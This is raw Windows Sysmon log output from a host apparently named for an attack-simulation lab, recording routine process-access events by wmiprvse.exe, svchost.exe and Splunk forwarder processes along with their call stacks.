16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030848Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030847Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030846Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030845Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030844Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:50.004{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030843Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030842Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030841Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030840Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030839Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030838Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030837Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030836Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030835Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030866Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:07.457{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55DF-6008-F606-00000000A301}8024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030865Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:07.441{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030864Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:07.441{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030863Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:07.441{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030862Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:07.441{7901BC46-4986-6008-0C00-00000000A301}6087488C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030861Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:07.441{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-55DF-6008-F606-00000000A301}8024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030860Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:07.441{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55DF-6008-F606-00000000A301}8024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030859Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:07.301{7901BC46-55DF-6008-F606-00000000A301}8024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control 